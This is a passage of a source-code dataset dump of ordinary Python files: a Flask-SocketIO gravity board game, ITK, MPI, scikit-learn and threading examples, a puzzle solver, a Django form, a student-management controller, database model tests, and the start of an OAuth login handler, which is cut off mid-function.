+{"seq_id":"347837366","text":"from flask import Flask, render_template, session, redirect, request, copy_current_request_context, url_for\nfrom flask_socketio import SocketIO, emit, join_room, rooms, disconnect\nasync_mode = None\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'secret!'\nsocketio = SocketIO(app, async_mode=async_mode)\n\nusercount = 0\n\nboard = [\n    [0,0,0,0,0,0,0],\n    [0,0,0,0,0,0,0],\n    [0,0,0,0,0,0,0],\n    [0,0,0,0,0,0,0],\n    [0,0,0,0,0,0,0],\n    [0,0,0,0,0,0,0],\n    [0,0,0,0,0,0,0]\n]\n\n\n\nflag = 1\n\nimport random\ndef getRandGravity():\n    tmp = random.randint(0,3)\n    res = ''\n    if tmp == 0: res = 'N'\n    elif tmp == 1: res = 'S'\n    elif tmp == 2: res = 'W'\n    elif tmp == 3: res = 'E'\n\n    return res\n\ndef appplyGravity(board, gravityD):\n    if gravityD == 'W':\n        newBoard = [[0 for col in range(7)] for row in range(7)]\n        for i in range(0,7):\n            flag = 0\n            k = 0\n            for j in range(0, 7):\n                if board[i][j] != 0:\n                    flag = j\n                    break\n            for j in range(flag, 7):\n                newBoard[i][k] = board[i][j]\n                k += 1\n        return newBoard\n    if gravityD == 'E':\n        newBoard = [[0 for col in range(7)] for row in range(7)]\n        for i in range(0,7):\n            flag = 0\n            k = 6\n            for j in range(6, -1, -1):\n                if board[i][j] != 0:\n                    flag = j\n                    break\n            for j in range(flag, -1, -1):\n                newBoard[i][k] = board[i][j]\n                k -= 1\n        return newBoard\n    if gravityD == 'N':\n        newBoard = [[0 for col in range(7)] for row in range(7)]\n        for i in range(0,7):\n            flag = 0\n            k = 0\n            for j in range(0, 7):\n                if board[j][i] != 0:\n                    flag = j\n                    break\n            for j in range(flag, 7):\n                newBoard[k][i] = board[j][i]\n                k += 1\n        return newBoard\n    if gravityD == 'S':\n        newBoard = [[0 for col in range(7)] for row in range(7)]\n        for i in range(0,7):\n            flag = 0\n            k = 6\n            for j in range(6, -1, -1):\n                if board[j][i] != 0:\n                    flag = j\n                    break\n            for j in range(flag, -1, -1):\n                newBoard[k][i] = board[j][i]\n                k -= 1\n        return newBoard\n\ndef checkGameStatus(board):\n    flag = 0\n    # 가로세로 판정\n    for i in range(7):\n        for j in range(4):\n            if board[i][j] == board[i][j+1] and board[i][j] == board[i][j+2] and board[i][j] == board[i][j+3] and board[i][j] != 0:\n                flag = board[i][j]\n            if board[j][i] == board[j+1][i] and board[j][i] == board[j+2][i] and board[j][i] == board[j+3][i] and board[j][i] != 0:\n                flag = board[i][j]\n\n    # 우 하향 대각선 판정\n    for i in range(4):\n        for j in range(4):\n            if board[i][j] == board[i+1][j+1] and board[i][j] == board[i+2][j+2] and board[i][j] == board[i+3][j+3] and board[i][j] != 0:\n                flag = board[i][j]\n\n    # 좌 하향 대각선 판정\n    for i in range(0,4):\n        for j in range(3,7):\n            if board[i][j] == board[i+1][j-1] and board[i][j] == board[i+2][j-2] and board[i][j] == board[i+3][j-3] and board[i][j] != 0:\n                flag = board[i][j]\n\n    return flag\n\ngravity = getRandGravity()\n\n@app.before_request\ndef 
before_request():\n    if usercount == 2:\n        pass\n        #return \"X\"\n    \n@app.route('/')\ndef index():\n    return render_template('index.htm')\n\n@app.route('/close')\ndef close():\n    return redirect(url_for('close.htm'))\n\n@socketio.on('my_event', namespace='/test')\ndef test_message(message):\n    emit('my_response', {'data': message['data'], 'board': board, 'gravity': gravity})\n\n@socketio.on('join', namespace='/test')\ndef join(message):\n    join_room(message['room'])\n    emit('my_response', {'data': 'In rooms: '.join(rooms())})\n\n@socketio.on('my_room_event', namespace='/test')\ndef send_room_message(message):\n    global flag\n    if flag == 1: flag = 2\n    else: flag = 1   \n    data = message['data']\n    gravity = getRandGravity()\n    data = appplyGravity(data, gravity)\n    emit('my_response', {'data': message['data'], 'board': data, 'gravity': gravity, 'flag':flag}, room=message['room'])\n    \n@socketio.on('disconnect_request', namespace='/test')\ndef disconnect_request():\n    @copy_current_request_context\n    def can_disconnect():\n        disconnect()\n    emit('my_response', {'data': 'Disconnected!'}, callback=can_disconnect)\n\n@socketio.on('connect', namespace='/test')\ndef test_connect():\n    global usercount\n    print(usercount)\n    if usercount == 0 or usercount == 1:\n        emit('my_response', {'data': 'Connected', 'count': 0})\n        usercount += 1\n       \n    elif usercount == 2:\n        return \"X\"\n\n@socketio.on('disconnect', namespace='/test')\ndef test_disconnect():\n    global usercount\n    usercount -= 1\n    print('Client disconnected', request.sid)\n\nif __name__ == '__main__':\n    socketio.run(app)","sub_path":"back-end/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
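The board helpers in this record are pure functions, so they can be sanity-checked without starting the Socket.IO server. A minimal sketch (assumes app.py imports cleanly, i.e. Flask and flask_socketio are installed):

```python
from app import appplyGravity, checkGameStatus

board = [[0] * 7 for _ in range(7)]
board[0][3] = 1                    # a lone stone at the top of column 3

south = appplyGravity(board, 'S')  # pull everything toward the bottom edge
print(south[6][3])                 # 1 -- the stone fell to the bottom row
print(checkGameStatus(south))      # 0 -- one stone cannot make four in a row
```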
+{"seq_id":"15882485","text":"#!/usr/bin/env python\n\nimport itk\n\nDimension = 2\nPixelType = itk.ctype('unsigned char')\nImageType = itk.Image[PixelType, Dimension]\n\ndef CreateFixedImage(image):\n    start = itk.Index[Dimension]()\n    start.Fill(0)\n\n    size = itk.Size[Dimension]()\n    size.Fill(100)\n\n    region = itk.ImageRegion[Dimension]()\n    region.SetSize(size)\n    region.SetIndex(start)\n\n    image.SetRegions(region)\n    image.Allocate()\n    image.FillBuffer(0)\n\n    index = itk.Index[Dimension]()\n    for ii in range(10, 20):\n        for jj in range(10, 20):\n            index[0] = ii\n            index[1] = jj\n            image.SetPixel(index, 255)\n\n    writer = itk.ImageFileWriter.New(Input=image)\n    writer.SetFileName(\"fixed.png\")\n    writer.Update()\n\ndef CreateMovingImage(image):\n    start = itk.Index[Dimension]()\n    start.Fill(0)\n\n    size = itk.Size[Dimension]()\n    size.Fill(100)\n\n    region = itk.ImageRegion[Dimension]()\n    region.SetSize(size)\n    region.SetIndex(start)\n\n    image.SetRegions(region)\n    image.Allocate()\n    image.FillBuffer(0)\n\n    index = itk.Index[Dimension]()\n    for ii in range(50, 60):\n        for jj in range(50, 60):\n            index[0] = ii\n            index[1] = jj\n            image.SetPixel(index, 100)\n\n    writer = itk.ImageFileWriter.New(Input=image)\n    writer.SetFileName(\"moving.png\")\n    writer.Update()\n\nfixed_image = ImageType.New()\nCreateFixedImage(fixed_image)\n\nmoving_image = ImageType.New()\nCreateMovingImage(moving_image)\n\nVectorComponentType = itk.ctype('float')\nVectorType = itk.Vector[VectorComponentType, Dimension]\nDisplacementFieldType = itk.Image[VectorType, Dimension]\n\nRigid2DTransformType = itk.Rigid2DTransform[itk.D]\nlandmark_based_transform_initializer = \\\n        itk.LandmarkBasedTransformInitializer[itk.Transform[itk.D, Dimension,\n            Dimension]].New()\n\nLandmarkPointType = itk.Point[itk.D, Dimension]\nLandmarkContainerType = itk.vector[LandmarkPointType]\n\nfixed_landmarks = LandmarkContainerType()\nmoving_landmarks = LandmarkContainerType()\n\nfixed_point = LandmarkPointType()\nmoving_point = LandmarkPointType()\n\nfixed_point[0] = 10\nfixed_point[1] = 10\nmoving_point[0] = 50\nmoving_point[1] = 50\nfixed_landmarks.push_back(fixed_point)\nmoving_landmarks.push_back(moving_point)\n\nfixed_point[0] = 10\nfixed_point[1] = 20\nmoving_point[0] = 50\nmoving_point[1] = 60\nfixed_landmarks.push_back(fixed_point)\nmoving_landmarks.push_back(moving_point)\n\nfixed_point[0] = 20\nfixed_point[1] = 10\nmoving_point[0] = 60\nmoving_point[1] = 50\nfixed_landmarks.push_back(fixed_point)\nmoving_landmarks.push_back(moving_point)\n\nfixed_point[0] = 20\nfixed_point[1] = 20\nmoving_point[0] = 60\nmoving_point[1] = 60\nfixed_landmarks.push_back(fixed_point)\nmoving_landmarks.push_back(moving_point)\n\nlandmark_based_transform_initializer.SetFixedLandmarks(fixed_landmarks)\nlandmark_based_transform_initializer.SetMovingLandmarks(moving_landmarks)\n\ntransform = Rigid2DTransformType.New()\ntransform.SetIdentity()\nlandmark_based_transform_initializer.SetTransform(transform)\nlandmark_based_transform_initializer.InitializeTransform()\n\nresampler = itk.ResampleImageFilter.New(Input=moving_image)\nresampler.SetTransform(transform)\n# 
resampler.SetReferenceImage(fixed_image)\nresampler.SetSize(fixed_image.GetLargestPossibleRegion().GetSize())\nresampler.SetOutputOrigin(fixed_image.GetOrigin())\nresampler.SetOutputSpacing(fixed_image.GetSpacing())\nresampler.SetOutputDirection(fixed_image.GetDirection())\nresampler.SetDefaultPixelValue(200)\nresampler.UpdateLargestPossibleRegion()\n\nwriter = itk.ImageFileWriter.New(Input=resampler.GetOutput())\nwriter.SetFileName(\"output.png\")\nwriter.UpdateLargestPossibleRegion()\n","sub_path":"Comment/ITKWikiExamples/Registration/LandmarkBasedTransformInitializer.py","file_name":"LandmarkBasedTransformInitializer.py","file_ext":"py","file_size_in_byte":3637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
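A plausible sanity check to append to the example above (an editor's suggestion, not part of the original): the four landmark pairs differ by a pure (+40, +40) shift, so the initialized rigid transform's parameters, ordered [angle, tx, ty] for itk.Rigid2DTransform, should come out near [0, 40, 40].

```python
# Optional check, using the `transform` variable from the script above.
print(transform.GetParameters())   # expected approximately [0.0, 40.0, 40.0]
```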
+{"seq_id":"409920140","text":"\"\"\"\nOne of the most important features among those provided by MPI is the point-to-point\ncommunication, which is a mechanism that enables data transmission between two\nprocesses: a process receiver, and process sender.\nThe Python module mpi4py enables point-to-point communication via two functions:\n    Comm.Send(data, process_destination) : This sends data to the destination\n        process identifid by its rank in the communicator group\n    Comm.Recv(process_source) : This receives data from the source process, which\n        is also identifid by its rank in the communicator group\nThe Comm parameter, which stands for communicator, defies the group of processes, that\nmay communicate through message passing:\n    comm = MPI.COMM_WORLD\n\"\"\"\n\nfrom mpi4py import MPI\n\ncomm = MPI.COMM_WORLD\nrank = comm.rank\nprint('my rank is:', rank)\n\nif rank == 0:\n    data = 100000000\n    destination_process = 4\n    comm.send(data, dest=destination_process)\n    print('sending data %s'%data + \" to process %d\"%destination_process)\n\nif rank == 1:\n    destination_process = 8\n    data = 'hello'\n    comm.send(data, dest=destination_process)\n    print('sending data %s'%data + \" to process %d\"%destination_process)\n\nif rank == 4:\n    data = comm.recv(source=0)\n    print('data received is = %s'%data)\n\nif rank == 8:\n    data = comm.recv(source=1)\n    print('data received is = %s'%data)\n\n# mpiexec -n 9 python ","sub_path":"ParallelProgramming/ProcessParallel/pointToPointCommunication_MPI.py","file_name":"pointToPointCommunication_MPI.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"580742175","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics import classification_report, f1_score\nfrom sklearn.model_selection import KFold\nfrom sklearn.linear_model import LogisticRegression\n\n# Load training data file\nrdf = pd.read_csv('Train.csv')\n\n# Remove rows without required features\nrdf = rdf[rdf['reviewText'].notna()]\nrdf = rdf[rdf['summary'].notna()]\nrdf = rdf[rdf['overall'].notna()]\n\n# A product is awesome if its average overall rating is greater than 4.5 stars\nproduct_is_awesome = lambda x: 1 if np.mean(x) > 4.5 else 0\nproddf = rdf.groupby('amazon-id').agg({'overall': product_is_awesome})\n\n# An individual review is awesome if its overall rating is 5 stars\nreview_is_awesome = lambda x: 1 if x == 5 else 0\nrdf['awesome'] = rdf['overall'].map(review_is_awesome)\n\n# We want to analyze both text fields as one\nrdf['text'] = rdf['reviewText'] + rdf['summary']\n\n# Train and test with 10-fold split\nf1s = []\nkf = KFold(n_splits=10)\nfor train_idx, test_idx in kf.split(proddf):\n    trainproddf = proddf.iloc[train_idx]\n    testproddf = proddf.iloc[test_idx]\n\n    # Aggregate all rows with reviews in the product dfs\n    traindf = rdf[rdf['amazon-id'].isin(trainproddf.index)]\n    testdf = rdf[rdf['amazon-id'].isin(testproddf.index)]\n\n    # Prepare sentiment analysis data\n    X_train = traindf['text']\n    X_test = testdf['text']\n    y_train = traindf['awesome']\n\n    # Transform text with TfidfVectorizer\n    tfv = TfidfVectorizer(ngram_range=(1,2))\n    X_train = tfv.fit_transform(X_train, y_train)\n    X_test = tfv.transform(X_test)\n\n    # Classify with logistic regression\n    lr = LogisticRegression(max_iter=10000, n_jobs=4)\n    lr.fit(X_train, y_train)\n    testdf['prediction'] = lr.predict(X_test)\n\n    # Products are predicted to be awesome if the average of review predictions is over 80%\n    prediction_is_awesome = lambda x: 1 if np.mean(x) > 0.80 else 0\n    prodpreddf = testdf.groupby('amazon-id').agg({'prediction': prediction_is_awesome})\n\n    print(classification_report(testproddf['overall'], prodpreddf['prediction']))\n    f1s.append(f1_score(testproddf['overall'], prodpreddf['prediction'], average='weighted'))\n\nprint(np.asarray(f1s).mean())\n\n    ","sub_path":"testing code/test_classify.py","file_name":"test_classify.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"253044828","text":"from sys import argv as args\r\nfrom copy import deepcopy\r\nfrom collections import deque\r\n\r\nstates = (\".\", \"|\", \"#\")\r\n\r\nivals = dict()\r\nivals[\"#\"] = 0\r\nivals[\".\"] = 0\r\nivals[\"|\"] = 0\r\n\r\ndef parseLine(l):\r\n\treturn tuple([states.index(c) for c in l])\r\n\r\nfile = open(\"input.txt\")\r\ninput = file.read()\r\nfile.close()\r\n\r\nsinput = \"\"\".#.#...|#.\r\n.....#|##|\r\n.|..|...#.\r\n..|#.....#\r\n#.#|||#|#|\r\n...#.||...\r\n.|....|...\r\n||...#|.#|\r\n|.||||..|.\r\n...#.|..|.\"\"\"\r\n\r\nvmap = [parseLine(l) for l in input.split(\"\\n\") if len(l) != 0]\r\nylen = len(vmap)\r\nxlen = len(vmap[0])\r\n\r\ndef getAt(x, y):\r\n\tif y < 0 or y >= ylen or x < 0 or x >= xlen:\r\n\t\treturn None\r\n\treturn vmap[y][x]\t\t\r\n\r\ndef next(x, y):\r\n\tv = vmap[y][x]\r\n\taround = list()\r\n\t[[around.append(getAt(x+i-1, y+j-1)) for j in range(3) if not (i == 1 and j == 1)] for i in range(3)]\r\n\tif v == 0:\r\n\t\tif len([v for v in around if v == 1]) >= 3:\r\n\t\t\treturn 1\r\n\telif v == 1:\r\n\t\tif len([v for v in around if v == 2]) >= 3:\r\n\t\t\treturn 2\r\n\telif v == 2:\r\n\t\tif len([v for v in around if v == 1]) < 1 or len([v for v in around if v == 2]) < 1:\r\n\t\t\treturn 0\r\n\treturn v\r\n\r\ndef getVals():\r\n\tvals = [0 for x in range(3)]\r\n\tfor y in range(ylen):\r\n\t\tfor x in range(xlen):\r\n\t\t\tvals[vmap[y][x]] += 1\r\n\treturn vals\r\n\r\ndef drawMap(cmap):\r\n\tfor y in range(ylen):\r\n\t\tprint(\"\".join([str(c) for c in cmap[y]]))\r\n\r\ndef iterate(n):\r\n\tglobal vmap\r\n\tfor i in range(n):\r\n\t\tomap = [deque() for y in range(ylen)]\r\n\t\tfor y in range(ylen):\r\n\t\t\tfor x in range(xlen):\r\n\t\t\t\tomap[y].append(next(x, y))\r\n\t\tvmap = omap\r\n\r\ndef getRes():\r\n\tvals = getVals()\r\n\treturn (vals[1] * vals[2])\r\n\r\ndef solve1():\r\n\tdrawMap(vmap)\r\n\titerate(10)\r\n\tvals = getVals()\t\r\n\tdrawMap(vmap)\r\n\tprint(vals[1] * vals[2])\r\n\treturn\r\n\r\ndef solve2():\r\n\titerate(1000)\r\n\tomap = deepcopy(vmap)\r\n\tcounter = 0\r\n\tstop = False\r\n\twhile not stop:\r\n\t\titerate(1)\r\n\t\tcounter += 1\r\n\t\tif vmap == omap:\r\n\t\t\tstop = True\r\n\r\n\tprint(counter)\r\n\tprint(getRes())\r\n\tdrawMap(vmap)\r\n\treturn\r\n\r\ndef main():\r\n\tif len(args) > 1:\r\n\t\tif args[1] == \"1\":\r\n\t\t\tsolve1()\r\n\t\telif args[1] == \"2\":\r\n\t\t\tsolve2()\r\n\r\nmain()\r\n","sub_path":"18/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"296375087","text":"\n'''\n    创建一个可执行线程需要两个要素:\n    线程对象。是threading模块线程类Thread所创建的对象。\n    线程体。是线程执行的函���。\n\n    提供线程体:\n    1、自定义函数作为线程体\n    2、继承Thread类重现run()方法\n\n    threading.Thread(target=None, name=None, args-())\n\n'''\n\nimport threading\nimport time\n\n# 线程体函数\ndef thread_body():\n    # 当前线程对象\n    t = threading.current_thread()\n    for n in range(5):\n        # 当前线程名\n        print('第{0}次执行线程{1}'.format(n, t.name))\n        # 线程休眠\n        time.sleep(1)\n    print('线程{0}执行完成!'.format(t.name))\n\n\n# 主函数\ndef main():\n    # 创建线程对象t1\n    t1 = threading.Thread(target=thread_body)\n    # 启动线程\n    t1.start()\n\n    # 创建线程对象t2\n    t2 = threading.Thread(target=thread_body)\n    # 启动线程\n    t2.start()\n\n\nif __name__ == '__main__':\n    main()\n\n","sub_path":"第三章 Python高级实用库与框架/part05 Python多线程编程/5-3 自定义函数作为线程体/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"373801217","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 29 20:49:37 2016\n\n@author: Methinee\n\"\"\"\nimport pandas as pd\n\ndf_file = pd.read_csv('../data/df_dropSub_less20.csv',delimiter=\",\", skip_blank_lines = True, \n                 error_bad_lines=False)\n                 \ndrop_naResult = df_file[df_file['4RESULT'] != 0]\ndrop_naResult.to_csv('../data'+'/df_dropSub_less20_dropNaResult.csv')","sub_path":"pae/forcast/src/create_dfmore20_dropNanResult.py","file_name":"create_dfmore20_dropNanResult.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"367365897","text":"\"\"\"Classes for forms related to organizations.\"\"\"\n\nfrom django.forms import ModelForm\n\nfrom organizations.models import Organization\n\n\nclass PopeOrganizationForm(ModelForm):\n    class Meta:\n        \"\"\"Meta default.\"\"\"\n        model = Organization\n        fields = [\n            'org_name',\n            'email',\n            'telephone',\n            'cep',\n            'neighbourhood',\n            'addr',\n            'additional_addr'\n        ]\n","sub_path":"organizations/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"132373236","text":"import traceback\n\nfrom models.assignment import Assignment\nfrom models.assignment_container import AssignmentContainer\nfrom models.group import Group\nfrom models.group_container import GroupContainer\nfrom models.student import Student\nfrom models.user_container import UserContainer\nfrom views.mentor_view import MentorView\n\n\nclass MentorController:\n\n    def __init__(self):\n        ...\n\n    def start(self):\n        \"\"\"\n        Starts controller\n\n        :return: None\n        \"\"\"\n        exit_program = False\n        while not exit_program:\n            try:\n                option = MentorView.display_menu()\n                if option == '1':\n                    self.show_students()\n                elif option == '2':\n                    self.add_assignment()\n                elif option == '3':\n                    self.show_assignments()\n                elif option == '4':\n                    self.grade_assignment()\n                elif option == '5':\n                    self.check_attendance()\n                elif option == '6':\n                    self.change_student_data()\n                elif option == '7':\n                    self.promote_user_to_student()\n                elif option == '8':\n                    self.edit_groups()\n                elif option == '9':\n                    self.edit_groups(False)\n                elif option == '0':\n                    exit_program = True\n                else:\n                    MentorView.show_invalid_input()\n            except IndexError:\n                MentorView.display_index_error()\n            except ValueError as error:\n                if 'invalid literal' in str(error):\n                    MentorView.show_invalid_input()\n                else:\n                    MentorView.display_date_error()\n            except AttributeError:\n                MentorView.display_group_exists()\n            except Exception:\n                tb = traceback.format_exc()\n                print(tb)\n                input()\n\n        UserContainer.get_instance().save_users_to_file()\n\n    def show_students(self):\n        \"\"\"\n        Displays students data\n\n        :return: None\n        \"\"\"\n        students_list = UserContainer.get_instance().get_students_list()\n        MentorView.display_students_list(students_list)\n\n    def show_assignments(self):\n        \"\"\"\n        Displsys assigments data\n\n        :return: None\n        \"\"\"\n        assignments = AssignmentContainer.get_instance().get_assignments_list()\n        MentorView.display_assignments(assignments)\n\n    def add_assignment(self):\n        \"\"\"\n        Adds new assigments\n\n        :return: None\n        \"\"\"\n        students_list = UserContainer.get_instance().get_students_list()\n        deadline, title, description = MentorView.return_assignment_values()\n        new_assignment = Assignment(deadline, title, description)\n        AssignmentContainer.get_instance().add_assignment(new_assignment)\n        for student in students_list:\n            student.add_student_assignment(deadline, title, description)\n\n    def grade_assignment(self):\n        \"\"\"\n        Adds grade to chosen assigment\n\n        :return: None\n        \"\"\"\n        students_list = UserContainer.get_instance().get_students_list()\n        if not students_list:\n            MentorView.display_not_enough_data()\n            return\n        student_index = 
MentorView.get_student_index(students_list)\n        student_index = int(student_index)\n        student = students_list[student_index]\n        assignment_index, grade = MentorView.get_grade_values(student)\n        students_list = UserContainer.get_instance().get_students_list()\n        students_list[student_index].assignments[assignment_index].grade = grade\n\n    def check_attendance(self):\n        \"\"\"\n        Checks whether students from a certain group are present and updates the group's attendance count\n\n        :return: None\n        \"\"\"\n        groups = GroupContainer.get_instance().get_groups_list()\n        if groups:\n            group_index = MentorView.get_group_index(groups)\n            group_index = int(group_index)\n            group = groups[group_index]\n        else:\n            MentorView.display_not_enough_data()\n            return\n        group_students = GroupContainer.get_instance().get_group(group.name).get_student_list()\n        for student in group_students:\n            student_present = MentorView.get_presence(student)\n            if student_present:\n                student.attendance += 1\n        UserContainer.get_instance().save_users_to_file()\n        group.attendance_check_count += 1\n        GroupContainer.get_instance().save_groups_to_file()\n\n    def change_student_data(self):\n        \"\"\"\n        Edits student data\n\n        :return: None\n        \"\"\"\n        value_changing = True\n        students_list = UserContainer.get_instance().get_students_list()\n        if not students_list:\n            MentorView.display_not_enough_data()\n            return\n        student_index = MentorView.get_student_index(students_list)\n        student_index = int(student_index)\n        student = students_list[student_index]\n        while value_changing:\n            value_to_change = MentorView.get_student_value_to_change()\n            if value_to_change == '1':\n                student.login = MentorView.get_new_value('login')\n            elif value_to_change == '2':\n                student.name = MentorView.get_new_value('name')\n            elif value_to_change == '3':\n                student.password = MentorView.get_new_value('password')\n            elif value_to_change == '4':\n                additional_days = MentorView.get_additional_attendance()\n                student.attendance += int(additional_days)\n            elif value_to_change == '5':\n                groups = GroupContainer.get_instance().get_groups_list()\n                if not groups:\n                    MentorView.display_not_enough_data()\n                    return\n                group_index = MentorView.get_group_index(groups)\n                group_index = int(group_index)\n                GroupContainer.get_instance().add_student_to_group(groups[group_index].name, student)\n                UserContainer.get_instance().save_users_to_file()\n            elif value_to_change == '6':\n                return\n            else:\n                MentorView.show_invalid_input()\n\n    def promote_user_to_student(self):\n        \"\"\"\n        Promotes a user to the students list\n\n        :return: None\n        \"\"\"\n        not_assigned_users = UserContainer.get_instance().get_not_assigned_users_list()\n        user_index = MentorView.get_user_index(not_assigned_users)\n        user_index = int(user_index)\n        user_to_assign = not_assigned_users[user_index]\n        name = user_to_assign.name\n        login = 
user_to_assign.login\n        password = user_to_assign.password\n        phone_number = user_to_assign.phone_number\n        email = user_to_assign.email\n        UserContainer.get_instance().remove_user(user_to_assign)\n        if not user_to_assign:\n            return\n        user_to_assign = Student(name, login, password, phone_number, email)\n        UserContainer.get_instance().add_user(user_to_assign)\n\n    def edit_groups(self, create_new=True):\n        \"\"\"\n        Creates or edits group\n\n        :param create_new: bool -> Decides if method will create new or edit existing group\n        :return: None\n        \"\"\"\n        if create_new:\n            new_group_name = MentorView.get_group_name()\n            group = Group(new_group_name)\n            GroupContainer.get_instance().add_group(group.name)\n        else:\n            groups_list = GroupContainer.get_instance().get_groups_list()\n            group_index = int(MentorView.get_group_index(groups_list))\n            new_group_name = MentorView.get_group_name()\n            for group in groups_list:\n                if group.name == new_group_name:\n                    raise AttributeError\n            groups_list[group_index].name = new_group_name\n\n\n\n","sub_path":"controllers/mentor_controller.py","file_name":"mentor_controller.py","file_ext":"py","file_size_in_byte":8011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"428047357","text":"# -*- coding: utf-8 -*-\n\nfrom lastuserapp import db\nimport lastuser_core.models as models\nfrom .test_db import TestDatabaseFixture\n\n\nclass TestClient(TestDatabaseFixture):\n    def setUp(self):\n        super(TestClient, self).setUp()\n        self.user = models.User.query.filter_by(username=u\"user1\").first()\n\n\nclass TestUserClientPermissions(TestDatabaseFixture):\n    def setUp(self):\n        super(TestUserClientPermissions, self).setUp()\n        self.user = models.User.query.filter_by(username=u\"user1\").first()\n        self.create_fixtures()\n\n    def create_fixtures(self):\n        # Add permission to the client\n        client = models.Client.query.filter_by(user=self.user).first()\n        self.permission = models.UserClientPermissions(user=self.user, client=client)\n        self.permission.permissions = u\"admin\"\n        db.session.add(self.permission)\n        db.session.commit()\n\n\nclass TestTeamClientPermissions(TestDatabaseFixture):\n    def setUp(self):\n        super(TestTeamClientPermissions, self).setUp()\n        self.user = models.User.query.filter_by(username=u\"user1\").first()\n        self.client = models.Client.query.filter_by(user=self.user).first()\n        self.create_fixtures()\n\n    def create_fixtures(self):\n        self.org = models.Organization(title=u\"test\", name=u\"Test\")\n        self.org.owners.users.append(self.user)\n        db.session.add(self.org)\n        self.team = models.Team(userid=self.user.userid, title=u\"developers\", org=self.org)\n        db.session.add(self.team)\n        self.team_client_permission = models.TeamClientPermissions(team=self.team, client=self.client, access_permissions=u\"admin\")\n        db.session.add(self.team_client_permission)\n        db.session.commit()\n\n\nclass TestResource(TestDatabaseFixture):\n    def setUp(self):\n        super(TestResource, self).setUp()\n        self.user = models.User.query.filter_by(username=u\"user1\").first()\n        self.client = models.Client.query.filter_by(user=self.user).first()\n        self.create_fixtures()\n\n    def create_fixtures(self):\n        resource = models.Resource(name=u\"resource\", title=u\"Resource\", client=self.client)\n        db.session.add(resource)\n        db.session.commit()\n\n    def test_find_all(self):\n        resources = self.client.resources\n        self.assertEqual(len(resources), 2)\n        self.assertEqual(set([r.name for r in resources]), set([u'test_resource', u'resource']))\n\n\nclass TestClientTeamAccess(TestDatabaseFixture):\n    def setUp(self):\n        super(TestClientTeamAccess, self).setUp()\n        self.user = models.User.query.filter_by(username=u\"user1\").first()\n        self.client = models.Client.query.filter_by(user=self.user).first()\n        self.client.team_access = True\n        db.session.commit()\n        self.create_fixtures()\n\n    def create_fixtures(self):\n        self.org = models.Organization(title=u\"test\", name=u\"Test\")\n        self.org.owners.users.append(self.user)\n        db.session.add(self.org)\n        self.team = models.Team(userid=self.user.userid, title=u\"developers\", org=self.org)\n        db.session.add(self.team)\n        self.team_client_permission = models.TeamClientPermissions(team=self.team, client=self.client, access_permissions=u\"admin\")\n        db.session.add(self.team_client_permission)\n        self.client_team_access = models.ClientTeamAccess(org=self.org, client=self.client, access_level=models.CLIENT_TEAM_ACCESS.ALL)\n    
    db.session.add(self.client_team_access)\n        db.session.commit()\n\n    def test_find_all(self):\n        self.assertIs(self.client.org_team_access[0], self.client_team_access)\n\n\nclass TestPermission(TestDatabaseFixture):\n    def setUp(self):\n        super(TestPermission, self).setUp()\n        self.user = models.User.query.filter_by(username=u\"user1\").first()\n        self.create_fixtures()\n\n    def create_fixtures(self):\n        self.org = models.Organization(title=u\"test\", name=u\"Test\")\n        self.org.owners.users.append(self.user)\n        db.session.add(self.org)\n        self.permission = models.Permission(user=self.user, org=self.org, name=u\"admin\", title=u\"admin\", allusers=True)\n        db.session.add(self.permission)\n        db.session.commit()\n","sub_path":"tests/test_model_client.py","file_name":"test_model_client.py","file_ext":"py","file_size_in_byte":4176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"587073124","text":"# -*- coding: utf-8 -*-\n# Copyright 2016 Mobicage NV\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# @@license_version:1.1@@\nimport httplib\nimport os\nimport urllib\nimport uuid\n\nimport webapp2\n\nfrom auth import login_user, logout_user, get_current_user_id\nfrom handlers import render_error_page, render_page\nfrom mcfw.exceptions import HttpException\nfrom plugin_loader import get_config\nfrom plugins.its_you_online_auth.bizz.authentication import get_user_scopes\nfrom plugins.its_you_online_auth.bizz.settings import get_organization\nfrom plugins.its_you_online_auth.exceptions.organizations import OrganizationNotFoundException\nfrom plugins.its_you_online_auth.models import OauthLoginState\nfrom plugins.its_you_online_auth.plugin_consts import OAUTH_BASE_URL, NAMESPACE, SOURCE_WEB, SOURCE_APP\nfrom plugins.its_you_online_auth.plugin_utils import get_sub_organization\nfrom utils import now\n\n\nclass SigninHandler(webapp2.RequestHandler):\n    def get(self):\n        user_id = get_current_user_id()\n        if user_id:\n            self.redirect('/')\n            return\n\n        render_page(self.response, os.path.join('unauthenticated', 'signin.html'), plugin_name=NAMESPACE)\n\n\nclass LogoutHandler(webapp2.RequestHandler):\n    def 